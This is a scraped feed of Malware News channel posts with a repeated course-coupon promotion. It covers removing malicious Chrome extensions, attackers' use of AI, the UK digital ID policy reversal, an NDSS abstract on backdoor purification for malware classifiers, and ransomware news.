Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


The extensions rendered a full-screen iframe pointing to a remote domain. This iframe overlaid the current webpage and visually appeared as the extension’s interface. Because this functionality was hosted remotely, it was not included in the review that allowed the extensions into the Web Store.

In other recent findings, we reported about extensions
spying on ChatGPT chats, sleeper extensions that monitored browser activity, and a fake extension that deliberately caused a browser crash.

To spread the risk of detections and take-downs, the attackers used a technique known as “extension spraying.” This means they used different names and unique identifiers for basically the same extension.

What often happens is that researchers provide a list of extension names and IDs, and it’s up to users to figure out whether they have one of these extensions installed.

Searching by name is easy when you open your “Manage extensions” tab, but unfortunately extension names are not unique. You could, for example, have the legitimate extension installed that a criminal tried to impersonate.

Searching by unique identifier
For Chrome and Edge, a browser extension ID is a unique 32‑character string of lowercase letters that stays the same even if the extension is renamed or reshipped.

When we’re looking at the extensions from a removal angle, there are two kinds: those installed by the user, and those force‑installed by other means (network admin, malware, Group Policy Object (GPO), etc.).

We will only look at the first type in this guide—the ones users installed themselves from the Web Store. The guide below is aimed at Chrome, but it’s almost the same for Edge.

How to find installed extensions
You can review the installed Chrome extensions like this:

— In the address bar type
chrome://extensions/.
— This will open the Extensions tab and show you the installed extensions by name.
— Now toggle Developer mode to on and you will also see their unique ID.

Don’t remove this one. It’s one of the good ones.

Removal method in the browser
Use the Remove button to get rid of any unwanted entries.

If it disappears and stays gone after restart, you’re done. If there is
no Remove button or Chrome says it’s “Installed by your administrator,” or the extension reappears after a restart, there’s a policy, registry entry, or malware forcing it.

Alternative
Alternatively, you can also search the Extensions folder. On Windows systems this folder lives here:
C:\Users\<your‑username>\AppData\Local\Google\Chrome\User Data\Default\Extensions.

Please note that the AppData folder is hidden by default. To unhide files and folders in Windows, open Explorer, click the View tab (or menu), and check the Hidden items box. For more advanced options, choose Options > Change folder and search options > View tab, then select Show hidden files, folders, and drives.

Chrome extensions folder

You can organize the list alphabetically by clicking on the Name column header once or twice. This makes it easier to find extensions if you have a lot of them installed.

Deleting the extension folder here has one downside. It leaves an orphaned entry in your browser. When you start Chrome again after doing this, the extension will no longer load because its files are gone. But it will still show up in the...


https://malware.news/t/how-to-find-and-remove-credential-stealing-chrome-extensions/104103
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

IRS Improperly Shares Immigrants’ Data with ICE: Explained

Erin Schilling and Erin Slowey report: The IRS’ improper disclosure of thousands of immigrants’ personal information to the Department of Homeland Security fulfilled early warnings that the data-sharing deal between the agencies would put taxpayer data at risk. The IRS and DHS in April 2025 agreed to share data of immigrants to help with criminal...


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Source

Article Link:
IRS Improperly Shares Immigrants’ Data with ICE: Explained – DataBreaches.Net

1 post - 1 participant

Read full topic

https://malware.news/t/irs-improperly-shares-immigrants-data-with-ice-explained/104098
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

AI-Driven Threats Targeting U.S. Organizations

AI-Driven Threats Targeting U.S. Organizations


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Artificial intelligence has become a force multiplier across the cybersecurity landscape. U.S. organizations are investing heavily in AI to improve detection, automate response, and analyze large volumes of telemetry in real time. At the same time, threat actors are integrating the same technologies into their operations to increase speed, scale, and precision.

In the United States, where
critical infrastructure, financial systems, defense contractors, healthcare providers, and technology firms operate at a massive scale, this dual-use dynamic creates a uniquely high-risk environment. AI lowers technical barriers, allowing attackers to automate reconnaissance, refine targeting, and generate convincing content with minimal effort. The result is not only more attacks, but more adaptive ones.

Recent findings reinforce this shift from theory to practice. In
OpenAI’s June 2025 report on disrupting malicious uses of AI, researchers identified and banned accounts linked to multiple influence operations and cyber campaigns that relied on AI-generated social media content, automated translation, malware development support, and large-scale impersonation efforts. In one influence campaign, threat actors generated at least 220 coordinated comments to simulate organic engagement around geopolitical narratives, while other operations used AI to bulk-produce resumes for deceptive employment schemes or assist in debugging malware components.

A fake tweet generated using AI by a threat Actor (Source: OpenAI’s June 2025 report)

These cases show that AI is no longer just assisting attackers at the margins. It is being embedded directly into
social engineering, influence operations, credential abuse, and even malware development workflows. For U.S. organizations, the risk is not simply increased volume. It is increased precision, automation, and adaptability. Security teams must now defend against adversaries who can generate persuasive content at scale, refine code iteratively, and coordinate cross-platform campaigns with unprecedented efficiency.



The Rise of AI-Enabled Adversaries
Threat actors are no longer relying solely on manual reconnaissance or handcrafted exploits. The Microsoft Digital Defense Report 2025 highlights that adversaries are applying generative AI to scale social engineering, support vulnerability discovery, and adapt malicious code to evade detection controls in real time. AI shortens preparation cycles and allows campaigns to move from planning to execution much faster than before.

Exploitation remains heavily tied to common entry points, but AI increases the efficiency of those tactics. Recent incident response data shows that 28% of breaches began with phishing or social engineering, while 18% stemmed from unpatched web-facing assets and 12% involved exposed remote services. AI-assisted scanning and content generation help adversaries target these weak points at scale, prioritizing high-probability entry paths across large enterprise environments.

The report also observed a significant rise in destructive campaigns targeting cloud environments, underscoring how AI-enabled reconnaissance and automation intersect with hybrid infrastructure risk. This shift is not limited to highly sophisticated groups. Widely accessible AI tools allow smaller criminal operations to generate convincing
phishing lures, refine scripts, and accelerate exploitation workflows. As automation becomes embedded in attacker playbooks, U.S. face to...

https://malware.news/t/ai-driven-threats-targeting-u-s-organizations/104096
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

UK’s Digital ID U-Turn: What It Means for Security

The UK government has quietly backed away from one of its most controversial policies. Making a national digital ID mandatory for anyone who wants to work in the country. Prime Minister Keir Starmer’s Brit Card plan would have required every working adult to hold a digital identity document on their phone by 2029. As part of a broader crackdown on illegal work and immigration. 


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


After a public outcry, fierce criticism from civil liberties groups, and a petition surpassing three million signatures, ministers have now said digital ID will be optional rather than compulsory. Digital right‑to‑work checks will still become mandatory.

Starmer’s u‑turn doesn’t end the debate, particularly as the government plans to push ahead with a voluntary digital ID program. So why was the plan so contentious in the first place?

Key takeaways

— The UK’s plan to make digital ID mandatory for all workers raised deep civil liberties concerns. This included fears of mass surveillance.
— Digital ID systems often rely on biometrics and centralized databases that. If breached or misused, they can expose people to long‑term identity, safety, and privacy risks.
— Even when optional, digital ID programs can “creep” into more areas of life over time. This makes it harder for people to opt out without employers or service providers excluding them.

Why was mandatory digital ID in the UK so controversial?
At first glance, a digital ID to prove you have the right to work sounds like a simple modernization of outdated, manually-intensive paper checks. The government argued that current right‑to‑work verification is a “mishmash” of paper systems with no proper audit trail. This makes it easy to forge documents and harder to catch illegal employment. 

The proposal would see an
official digital identity in a government app (GOV.UK Wallet), being stored on every citizen’s smartphone. The ID would contain the name, date of birth, nationality, residence status, and photo of the holder.

Critics warned that tying the right to work to a single state‑controlled
digital credential would fundamentally change the relationship between citizens and the government. Civil liberties group Big Brother Watch warned that simply participating in everyday life would require constant identity checks under the new system. 

For many, this looked less like a targeted tool against illegal work. And more like the foundation of a permanent population‑wide ID system.

Civil liberties and surveillance fears
The scale of public opposition was significant. A parliamentary petition opposing digital ID gathered nearly three million signatures, and
media reports linked those concerns directly to the government’s decision to abandon the mandatory requirement.

For many people, the greatest concern that this new scheme would become a tool of mass state surveillance. Though ministers initially insisted the system was about right‑to‑work checks, the list of proposed uses for the Brit Card, such as the
ability to claim social security benefits, began to expand rapidly.

With ministers allowing ‘scope creep’ from the outset, many citizens quickly came to understand just how dangerous the system may be in future. Advocates of digital ID were also unable to adequately explain how people without smartphones would be able to participate in society.

Central databases are high‑value targets
The UK’s proposed Digital ID system relies on a centralized database to store data on every citizen. That consolidation may be efficient, but it creates a single...


https://malware.news/t/uk-s-digital-id-u-turn-what-it-means-for-security/104094
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

ISC Stormcast For Friday, February 13th, 2026 https://isc.sans.edu/podcastdetail/9808, (Fri, Feb 13th)


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Article Link:
ISC Stormcast For Friday, February 13th, 2026 https://isc.sans.edu/podcastdetail/9808

1 post - 1 participant

Read full topic

https://malware.news/t/isc-stormcast-for-friday-february-13th-2026-https-isc-sans-edu-podcastdetail-9808-fri-feb-13th/104091
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

NDSS 2025 – PBP: Post-Training Backdoor Purification For Malware Classifiers

Session 12B: Malware


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Authors, Creators & Presenters: Dung Thuy Nguyen (Vanderbilt University), Ngoc N. Tran (Vanderbilt University), Taylor T. Johnson (Vanderbilt University), Kevin Leach (Vanderbilt University)

PAPER

PBP: Post-Training Backdoor Purification for Malware Classifiers

In recent years, the rise of machine learning (ML) in cybersecurity has brought new challenges, including the increasing threat of backdoor poisoning attacks on ML malware classifiers. These attacks aim to manipulate model behavior when provided with a particular input trigger. For instance, adversaries could inject malicious samples into public malware repositories, contaminating the training data and potentially misclassifying malware by the ML model. Current countermeasures predominantly focus on detecting poisoned samples by leveraging disagreements within the outputs of a diverse set of ensemble models on training data points. However, these methods are not applicable in scenarios involving ML-as-a-Service (MLaaS) or for users who seek to purify a backdoored model post-training. Addressing this scenario, we introduce PBP, a post-training defense for malware classifiers that mitigates various types of backdoor embeddings without assuming any specific backdoor embedding mechanism. Our method exploits the influence of backdoor attacks on the activation distribution of neural networks, independent of the trigger-embedding method. In the presence of a backdoor attack, the activation distribution of each layer is distorted into a mixture of distributions. By regulating the statistics of the batch normalization layers, we can guide a backdoored model to perform similarly to a clean one. Our method demonstrates substantial advantages over several state-of-the-art methods, as evidenced by experiments on two datasets, two types of backdoor methods, and various attack configurations. Our experiments showcase that PBP can mitigate even the SOTA backdoor attacks for malware classifiers, e.g., Jigsaw Puzzle, which was previously demonstrated to be stealthy against existing backdoor defenses. Notably, your approach requires only a small portion of the training data -- only 1% -- to purify the backdoor and reduce the attack success rate from 100% to almost 0%, a 100-fold improvement over the baseline methods.

ABOUT NDSS

The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.

Our thanks to the
Network and Distributed System Security (NDSS) Symposium for publishing their Creators, Authors and Presenter’s superb NDSSSymposium">NDSS Symposium 2025 Conference content on the Organizations' ndsssymposium?si=lLtn9sVVEwmZ8J9h3">YouTube Channel.

Permalink

The post
NDSS 2025 – PBP: Post-Training Backdoor Purification For Malware Classifiers appeared first on Security Boulevard.

Article Link:
NDSS 2025 - PBP: Post-Training Backdoor Purification For Malware Classifiers - Security Boulevard

1 post - 1 participant

Read full topic

https://malware.news/t/ndss-2025-pbp-post-training-backdoor-purification-for-malware-classifiers/104089
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

From Operations to Policy: Contributing to the Global Fight Against Ransomware

Today, the government of Canada issued a statement announcing that Arctic Wolf will continue to co-chair the Counter Ransomware Initiative Public-Private Sector Advisory Panel in 2026, alongside Public Safety Canada and BlackBerry. The panel will also include member organizations such as Ensign InfoSecurity, the Institute for Security and Technology, Microsoft, Palo Alto Networks, and the Royal United Service Institute.   Why Global Collaboration Is Essential for Modern Ransomware Defense  ... From Operations to Policy: Contributing to the Global Fight Against Ransomware


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Article Link:
Contributing to the Global Fight Against Ransomware | Arctic Wolf

1 post - 1 participant

Read full topic

https://malware.news/t/from-operations-to-policy-contributing-to-the-global-fight-against-ransomware/104087
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

ロンウイットと米国BasisTechが資本業務提携

The post ロンウイットと米国BasisTechが資本業務提携 appeared first on BasisTech.


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Article Link:
ロンウイットと米国BasisTechが資本業務提携 – BasisTech

1 post - 1 participant

Read full topic

https://malware.news/t/basistech/104085
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

Kettering Adventist Health now notifying patients affected by May 2025 ransomware attack

On May 20, 2025, CNN reported that a ransomware attack had triggered a “system-wide technology outage” at Kettering Adventist Health in Ohio. Disclosures by Kettering Health would later explain that the healthcare system had been attacked by InterLock, a ransomware gang who were threatening to destroy data and publish data if their demands were not...


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Source

Article Link:
Kettering Adventist Health now notifying patients affected by May 2025 ransomware attack – DataBreaches.Net

1 post - 1 participant

Read full topic

https://malware.news/t/kettering-adventist-health-now-notifying-patients-affected-by-may-2025-ransomware-attack/104083
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

Arctic Wolf Product Updates: February 2026

The most effective security operations aren’t built by buying more tools. They’re built by making the tools you already have work better together.  We hear from our customers that their security teams need to extract maximum value from their technology while operating more efficiently than ever. This quarter, Arctic Wolf doubled down on three areas to support these efforts: smarter integrations, clearer visibility, ... Arctic Wolf Product Updates: February 2026


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Article Link:
Arctic Wolf Product Updates: February 2026

1 post - 1 participant

Read full topic

https://malware.news/t/arctic-wolf-product-updates-february-2026/104081
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…
Subscribe to a channel